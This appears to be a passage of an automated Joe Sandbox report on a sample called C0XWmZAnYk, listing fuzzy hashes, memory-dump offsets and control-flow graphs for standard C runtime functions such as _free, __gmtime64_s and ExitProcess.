                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: 627c537dc8a3f977b77c960a8dfdf75c6fa3d97381f306a4529f07df81bf92d6
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: 89528370E00219DFDB50DFA4C849FAEBBB5FF49704F148198E509AB291DB71AE45CBA0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $
                • API String ID: 0-3993045852
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: 2982dabb368aa6edd87ccea6f94f6817eeeb55d8027c7fd172ae1e74d0f3530a
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 55326AB1E002299BDF609F64CC45BEEB7B9FF45700F0041EAA60DA6191EB748E84CF59
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction ID: fe1fb2e3ab739ea8176645a3ff9cfefadb5aa77c24ba01d7bbe5cb04769e0c73
                • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction Fuzzy Hash: 4A42AE71629F159BC3DADF24C88055BF3E1BFC8218F048A1DD99997A90DB38F819CA91
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction ID: 69f6ac55da2a5def7413c1898a1c28c057095d054880230e214713c92abd1fd6
                • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction Fuzzy Hash: 8B22DFB6914B168FC714CF19D08055AF7E1FF88324F158A6EE8A9A7B10D730BA55CB82
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction ID: baac403186130af08911232d4ee18b4665d247299bb2fb481ce2d7fb8ce41071
                • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction Fuzzy Hash: 16028D715187058FC756EE0CD49035AF3E1FFC8305F198A2DD68987B64E739AA198F82
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction ID: 76735b5b105a84a4370e889353d5dcd720f51073690874c4e590002a2ff7627e
                • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction Fuzzy Hash: 27C12833E2477906D764DEAF8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A96C0
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction ID: 5046439a0b83fdf7693be412f557283dca576e3362ee0f6dbfdf2fff711c4c6e
                • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction Fuzzy Hash: 82A1EB0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 9cc90b823a60d8eb1dde93a964cdc4658931f732105ffa950de4a0542ed79026
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 0CC17CB5E002599FCB54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction ID: 4962da409bbd1d93fe0108ef359881dac9ef751c01be923e7db1da80a7dd623d
                • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction Fuzzy Hash: B5B184B0039FA686CBD3FF30911024BF7E0BFC525DF44194AD59986864EB3EEA4E9215
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction ID: ed7d9371eaaf3fee34e7cc2c40936982c75af726baa445d7131a7488a04ad25c
                • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction Fuzzy Hash: 8A912573D187BA06D7609EAF8C441B9B7E3AFC4210F9B077ADD9467282C9309E0697D0
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction ID: fc9fb082f726c84f05c5b622bcc7683dea59ebac083dd293a3641e6c09378d0a
                • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction Fuzzy Hash: 45B169B5E002599FCB84DFE9C885ADEFBF0FF48210F64816AD919E7201E334AA558B54
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction ID: 5461fa353338c2b1963e23c60292eab8283b3f173a9f3253f218835c0e667865
                • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction Fuzzy Hash: B171D473A30B258B8714DEB98D94192F2F1EF84610B57C27CCE84E7B41EB31B95A96C0
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction ID: f533f3a1b74b1bfa6509053c1f3f1f3078fd966a68e18b12ba0c90f9e432295b
                • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction Fuzzy Hash: 108137B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83B41D770F8558B92
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction ID: 48ffecd2a2f4c159cc456df3e8881feb41da79d6d448afdaddcfb2cd2b8464f6
                • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction Fuzzy Hash: 7D710722535B7A06EBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4D77A4
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction ID: d1b926210fe06c5393ed349d07b3bcdaedfb9d59fa45b4c0efc4341cc80c1dd2
                • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction Fuzzy Hash: F5813775A10B669BD754CF2AD8C045AFBF1FB08310B518A2ADCA583B40D334F565DFA4
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction ID: f6cf5924b8aed2128a16bc9ab896c2e5b822902765c1e5ad4b0b465efe7a6d2d
                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction Fuzzy Hash: B361A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction ID: aa2947543325d365fc425dc07486ac5c7778d2eedcd197228ef9c2217de6c8ee
                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction Fuzzy Hash: 72617C3791262B9BDB61DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction ID: cbfc5e25aeea62c82100641705339f433180b8fd088e6f2635b592f27359db3f
                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction Fuzzy Hash: E951FD229257B946EBC3DA3D88504AEBBE0BE49206B460557DCD0B3181C72EDE4DB7E4
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                Memory Dump Source
                • Source File: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a53000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction ID: ac9d1d2373d69aad45239e3e0f87c721a1750f02c74dc978e6a74f30c6a0d092
                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction Fuzzy Hash: DB31583580A2819FDB15CF70D890AA5BB71FF9F32AF18859DD8818B106D335608AC794
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction ID: e1fae3f31adbd2ffdda7e9b272aa1c44b49dc00a73c450d64ef39a43b478ee7e
                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction Fuzzy Hash: 573114715283459FD751EF29C480A4BF7E0FFC8354F01DA19F98897221D731E984CA62
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: 912f1e1dc7e9caed05d0190a429f27213526f3fe349299f162891623788b7879
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: F611E67F24108243D614862ED4FC7B6E395EAC633372D427ADDB24B658D222EBCD9508
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction ID: b4c720267f782928b7fe2f7e47718cc879b182ba659d35db8b2d76ddc36e1ce2
                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction Fuzzy Hash: 20114F4A8492C4BDCF464A7840E56EBFFA58E3B218F4A71DAC8D44B743D01B190FE7A1
                Memory Dump Source
                • Source File: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a53000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: b8bc033cee9f054ea1e9f6249c585d92914685eacc8972c42a9fcaa29a649457
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 2411A073340200AFDB44CF55DC81EA673EAFB88360B298165ED08CB352D675E806C760
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: 5bfe388de213ff2e9d604cbcbea8a9da56766bb5da09578684d9c47c603e75d2
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: ED113C73350100AFEB58DE65DCE1FA673EAEB89360B298165E908CB316D676EC41C760
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction ID: fad662fca551acfe474f6e8d56df98d305291cb8c28bbbf01c19122bca086eec
                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction Fuzzy Hash: 3F012C768106629BD700DF3FC8C0456FBF1BB082117528B2ADC9083A41D334E662DBE4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 558 c56437-c56440 559 c56466 558->559 560 c56442-c56446 558->560 561 c56468-c5646b 559->561 560->559 562 c56448-c56459 call c59636 560->562 565 c5646c-c5647d call c59636 562->565 566 c5645b-c56460 call c55ba8 562->566 571 c5647f-c56480 call c5158d 565->571 572 c56488-c5649a call c59636 565->572 566->559 575 c56485-c56486 571->575 577 c564ac-c564cd call c55f4c call c56837 572->577 578 c5649c-c564aa call c5158d * 2 572->578 575->566 587 c564e2-c56500 call c5158d call c54edc call c54d82 call c5158d 577->587 588 c564cf-c564dd call c5557d 577->588 578->575 596 c56507-c56509 587->596 593 c56502-c56505 588->593 594 c564df 588->594 593->596 594->587 596->561
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 871d37eef9d3ce9ebf36bdaf50226a5e5c4cfcd580c54059d142ad1151730e5a
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: D121953D104600AAE721BF65D806E0A7BD4DF41763BE08019FC5556091FB318AD8E759

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 602 c53f16-c53f2f 603 c53f31-c53f3b call c55ba8 call c54c72 602->603 604 c53f49-c53f5e call c5bdc0 602->604 611 c53f40 603->611 604->603 610 c53f60-c53f63 604->610 612 c53f65 610->612 613 c53f77-c53f7d 610->613 616 c53f42-c53f48 611->616 617 c53f67-c53f69 612->617 618 c53f6b-c53f75 call c55ba8 612->618 614 c53f7f 613->614 615 c53f89-c53f9a call c60504 call c601a3 613->615 614->618 620 c53f81-c53f87 614->620 626 c54185-c5418f call c54c9d 615->626 627 c53fa0-c53fac call c601cd 615->627 617->613 617->618 618->611 620->615 620->618 627->626 632 c53fb2-c53fbe call c601f7 627->632 632->626 635 c53fc4-c53fcb 632->635 636 c53fcd 635->636 637 c5403b-c54046 call c602d9 635->637 638 c53fd7-c53ff3 call c602d9 636->638 639 c53fcf-c53fd5 636->639 637->616 643 c5404c-c5404f 637->643 638->616 647 c53ff9-c53ffc 638->647 639->637 639->638 645 c54051-c5405a call c60554 643->645 646 c5407e-c5408b 643->646 645->646 655 c5405c-c5407c 645->655 649 c5408d-c5409c call c60f40 646->649 650 c54002-c5400b call c60554 647->650 651 c5413e-c54140 647->651 658 c5409e-c540a6 649->658 659 c540a9-c540d0 call c60e90 call c60f40 649->659 650->651 660 c54011-c54029 call c602d9 650->660 651->616 655->649 658->659 668 c540d2-c540db 659->668 669 c540de-c54105 call c60e90 call c60f40 659->669 660->616 665 c5402f-c54036 660->665 665->651 668->669 674 c54107-c54110 669->674 675 c54113-c54122 call c60e90 669->675 674->675 678 c54124 675->678 679 c5414f-c54168 675->679 682 c54126-c54128 678->682 683 c5412a-c54138 678->683 680 c5413b 679->680 681 c5416a-c54183 679->681 680->651 681->651 682->683 684 c54145-c54147 682->684 683->680 684->651 685 c54149 684->685 685->679 686 c5414b-c5414d 685->686 686->651 686->679
                APIs
                • _memset.LIBCMT ref: 00C53F51
                  • Part of subcall function 00C55BA8: __getptd_noexit.LIBCMT ref: 00C55BA8
                • __gmtime64_s.LIBCMT ref: 00C53FEA
                • __gmtime64_s.LIBCMT ref: 00C54020
                • __gmtime64_s.LIBCMT ref: 00C5403D
                • __allrem.LIBCMT ref: 00C54093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C540AF
                • __allrem.LIBCMT ref: 00C540C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C540E4
                • __allrem.LIBCMT ref: 00C540FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C54119
                • __invoke_watson.LIBCMT ref: 00C5418A
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 61dedadf597a86a658b9f4437d26e3ecb1bc58dd2893fda57302fba7f0f57d2f
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: BE711A75A00B16ABD7289E79CC81B5FB3B9AF10365F144229FD14E7281E770DEC48798
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: ab9b72efd619cd624d1a038f4279673a989db9af47baba01747cfeecb6439d7a
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: F941E03A904308AFDB10AFA4D88279E7BB4EF0431AF504429FD1497192DF759ACDEB19
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: d61026e9240330c9febdb0556ceab2eb7e5fc2895329662d42ed82ff4ed66835
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 2931D43D900250EBEB215F14FC8494977A4FB54322398862AFD15672A0DFB45ECDAF98
                APIs
                • std::exception::exception.LIBCMT ref: 00C7FC1F
                  • Part of subcall function 00C6169C: std::exception::_Copy_str.LIBCMT ref: 00C616B5
                • __CxxThrowException@8.LIBCMT ref: 00C7FC34
